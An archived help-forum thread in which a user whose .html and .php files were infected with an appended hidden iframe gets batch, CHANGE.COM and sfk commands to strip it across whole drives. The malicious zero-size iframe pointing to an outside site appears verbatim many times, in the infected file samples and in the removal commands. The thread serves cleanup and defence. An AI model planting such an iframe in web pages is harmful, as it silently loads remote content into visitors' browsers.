Name: frannyj Date: November 8, 2008 at 15:28:56 Pacific Reply: (edit) Mechanix2Go I got a virus on my PC that caused the tag "<iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe>" to be appended to the end of ALL of my .html and .php files on ALL of my PC directories (i.e. approximately effected 700 files). Example of appended tag. Example 1: </body><iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe> and Example 2: ?><iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe> I know that your code can be modified to remove this tag from ALL the effected files of ALL of my directories, but I don't know how to modify your code to do so, can you please help? Thanks, Frannyj Report Offensive Follow Up For Removal =================================================== Response Number 6 Name: Mechanix2Go Date: November 8, 2008 at 15:43:58 Pacific Reply: (edit) Post one of the modified files. ===================================== If at first you don't succeed, you're about average. M2 Report Offensive Follow Up For Removal =================================================== Response Number 7 Name: frannyj Date: November 9, 2008 at 06:36:00 Pacific Reply: (edit) Thank you for your response. I have included sample effected code from both a .php and a .html file. Also, all the file lengths vary. ====== php code before virus ====== <?php $toaddress= $rmail; $subject = 'LWP Online Course Daily Email Message - Day #2'; $mailcontent = "\n" .'Dear '.$rfln.",\n"."\n" .'Congratulations! You have completed another daily assignment in'."\n" .'the Living With Purpose program.'."\n\n" .'Continue Being Your Best!'."\n\n" .'Live Large!'."\n\n" .'Marlon'."\n\n"; $fromaddress = 'From: purpose@successbychoice.com'."\n" .'Bcc: support@yess1.com, purpose@successbychoice.com'; mail($toaddress, $subject, $mailcontent, $fromaddress); ?> ====== php code after virus ====== <?php $toaddress= $rmail; $subject = 'LWP Online Course Daily Email Message - Day #2'; $mailcontent = "\n" .'Dear '.$rfln.",\n"."\n" .'Congratulations! You have completed another daily assignment in'."\n" .'the Living With Purpose program.'."\n\n" .'Continue Being Your Best!'."\n\n" .'Live Large!'."\n\n" .'Marlon'."\n\n"; $fromaddress = 'From: purpose@successbychoice.com'."\n" .'Bcc: support@yess1.com, purpose@successbychoice.com'; mail($toaddress, $subject, $mailcontent, $fromaddress); ?><iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe> ==================================================================== ====== html code before virus ====== <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>LWP Reports</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="xlwpc.css" / > </head> <body> <form ACTION="mlogs10.php" name="saveform2" METHOD="POST" onSubmit="return valid222( this )"> <div style="position: absolute; left: 180px; top: 80px"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td width="385"> <div align="center"> <table border="5" height="59" width="254" bgcolor="#FFFFFF" cellspacing="1" cellpadding="0"> <tr align="center"> <td width="133" height="17" bgcolor="#000080"><div align="right"> <small>Password:</small></div></td> <td height="17" width="133" bgcolor="#000080"><div align="left"> <input type="password" name="Lpassw" size="12" tabindex="2" maxlength="12"></div></td> <td height="17" bgcolor="#C0C0C0" align="center"><a href="javascript:alert('The password must be between 4 and 10 characters long.')"><small><small>Help</small></small></td> </tr> </table> <center><input TYPE="button" NAME="FormsButton2" tabindex="3" style="font-family: Verdana; font-size: 8pt" VALUE="Sign in" onClick="if (valid222(this.form)) this.form.submit()"></center> </div></td> <td align="center">Â </td> </tr> </table> </div> </FORM> </body> </html> ====== html code after virus ====== <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>LWP Reports</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="xlwpc.css" / > </head> <body> <form ACTION="mlogs10.php" name="saveform2" METHOD="POST" onSubmit="return valid222( this )"> <div style="position: absolute; left: 180px; top: 80px"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td width="385"> <div align="center"> <table border="5" height="59" width="254" bgcolor="#FFFFFF" cellspacing="1" cellpadding="0"> <tr align="center"> <td width="133" height="17" bgcolor="#000080"><div align="right"> <small>Password:</small></div></td> <td height="17" width="133" bgcolor="#000080"><div align="left"> <input type="password" name="Lpassw" size="12" tabindex="2" maxlength="12"></div></td> <td height="17" bgcolor="#C0C0C0" align="center"><a href="javascript:alert('The password must be between 4 and 10 characters long.')"><small><small>Help</small></small></td> </tr> </table> <center><input TYPE="button" NAME="FormsButton2" tabindex="3" style="font-family: Verdana; font-size: 8pt" VALUE="Sign in" onClick="if (valid222(this.form)) this.form.submit()"></center> </div></td> <td align="center">Â </td> </tr> </table> </div> </FORM> </body> </html><iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe> Report Offensive Follow Up For Removal ===================================================

Stripping html is a bit dicey in bat. If you can use a third party utility, and if you r files are no bigger than about 30KB, get this utility: http://golden-triangle.com/CHANGE.ZIP and use this one-liner: change.com filename.ext "<iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe>" "" ===================================== If at first you don't succeed, you're about average. M2

If You have larger files sfk would be an alternative. If you want to do just one file: sfk filter ###yourfilename#### -!"</html><iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe>" -write If you want to a whole drive sfk filter -!"<iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe>" -write -dir ###drive letter###:\ -file .htm .html .php This would remove that entire line, including anything else that is on the line from ALL files with the extensions .htm .html and .php on what ever drive you specify. You can change the drive to any directory, the recursion will start from the directory you specify. You may add or remove file extensions as desired. These commands will simulate the changes to be made add -yes to actually write back to the file when your sure it's right(I am now absolved of any and all damage that may occur ;). If you want to use these commands with delayed expansion enabled you will need to add 2 carat ^ symbols before the excliamation mark. According to the documentation lines over 4000 characters will cause problems. As was already pointed out dealing with html in batch can be dicey and it's not the >special characters< that are the main problem. Html can be formatted in many ways, line breaks tend to be the killers, what is essentially the same html code can have line breaks in many different places. Parser libraries in "proper languages" makes the job so much easier, because this formatting becomes irrelevant... Anyway because the code was added by a script it should be consistent and easy to filter out. Did it take long to convert the html tags to display properly? [edit] I just realised that your closing html tag is on the same line, here's one that will work just the same but wont kill anything else that happens to be on the same line. sfk replace -nocase -bin /3C696672616D65207372633D687474703A2F2F7777772E703138382E6E65742F786D2F786D787A2E68746D6C2077696474683D30206865696768743D303E3C2F696672616D653E// -dir ####driveletter####:\ -file .htm .html .php

Thank you both so much for your help. I'm now thinking that instead of "Removing" the lines, I need to do a "Search/Replace". This is what I'm now thinking. Basically I found a post (http://www.computing.net/answers/programming/batch-processing-text-files/15280.html), where the guy was trying to 1.delete blank lines. 2.search and replace string 3.delete comment lines. 4.remove trailing spaces. Instead of using all of the following code solution ====== Response Number 7 Name: Mechanix2Go Date: May 2, 2007 at 17:16:24 Pacific Reply: (edit) This may be more generally useful. It's not limited to 2 tokens. ::== clean#5.bat :: remove comments: #blabla, trailing spaces and do str subst :: lesson learned: echo tiplespawn 0>>file puts tiplespawn to con; stderr? @echo off setLocal EnableDelayedExpansion for %%F in (*.new *.t) do if exist %%F del %%F for /f "tokens=* delims= " %%c in ('dir/b/a-d *.cfg') do ( set n=%%~nc for /f "eol=# tokens=* delims= " %%a in (%%c) do ( call :sub1 %%a ) for /f "tokens=* delims= " %%t in (!n!.t) do ( set s=%%t set s=!s:tiplespawn 0=tiplespawn 1! echo !s!>>!n!.new ) ) goto :eof :sub1 >> !n!.t echo %* goto :eof ::== ====== I just need to use the piece where he does the "search and replace"; i'm thinking I just want to do a search and replace any occurance of "<iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe>" with a space (e.g. ""). Since all of my php and html scripts are written in notepad, my reasoning is that my files are in essence text files, so I'm not understand why a batch file wouldn't work here. Could the above code solution of Mechanix2Go be modified to only replace every occurance of "<iframe src=http://www.p188.net/xm/xmxz.html width=0 height=0></iframe>" with a space? What do you both think?

I think if using a third party utility is an option in this case I would use it, maybe I'm just lazy, I really just like the idea of getting it all done with one line. If using batch commands alone is your only option then it can still be done, it will probably be much slower. You would also need to step around characters that have special meanings to the command processor, like <,>,| and &. Whatever you decide to use it may prove to be useful to back up all of the files to be changed to a cd or some other storage medium. You may not like the idea of having the bad code on the backups but if something goes wrong you will have reference point, it would beat editing 700+ files manually to find what's wrong with them. The script below should copy all of the .htm, .html and .php files in the drive you specify into a directory of your choice, Obviously it is also a good idea to check that the backup has gone well.. for /f "delims=" %%g in ('dir <drive>:\*.htm /s /b /a^&dir <drive>:\*.html /s /b /a^&dir <drive>:\*.php /s /b /a') do copy "%%~fg" <drive>:\<path>\<dir> Below is another sfk command, this one replaces your problem code with a space, as with before you will need to add -yes at the end for it to actually write the file (and absolve me of any damage). sfk replace -nocase -bin /3C696672616D65207372633D687474703A2F2F7777772E703138382E6E65742F786D2F786D787A2E68746D6C2077696474683D30206865696768743D303E3C2F696672616D653E/20/ -dir <drive>:\ -file .html .htm .php

"Since all of my php and html scripts are written in notepad, my reasoning is that my files are in essence text files, so I'm not understand why a batch file wouldn't work here." They are text files. The problem is the chars with 'special meaning' especially the pipe and redirect [|<>]. I worked on it for a while and got nowhere. Are you unable to use a 3rd party utility? If so, let's hope IVO, who is the master, will jump in here and bail us out. ===================================== If at first you don't succeed, you're about average. M2

I'm not so worried about special characters, linebreaks are my poison... The below "seems" to work with all the special characters I threw at it. @echo off for /f "delims=" %%a in (html.htm) do ( set test="%%a" SETLOCAL ENABLEDELAYEDEXPANSION set test=!test:~1,-1! echo !test!>>newhtml.htm SETLOCAL DISABLEDELAYEDEXPANSION ) Obviously all this does is echo one file into another. It's more of a proof of concept that could be adapted(I.E. I don't have time to write the whole script)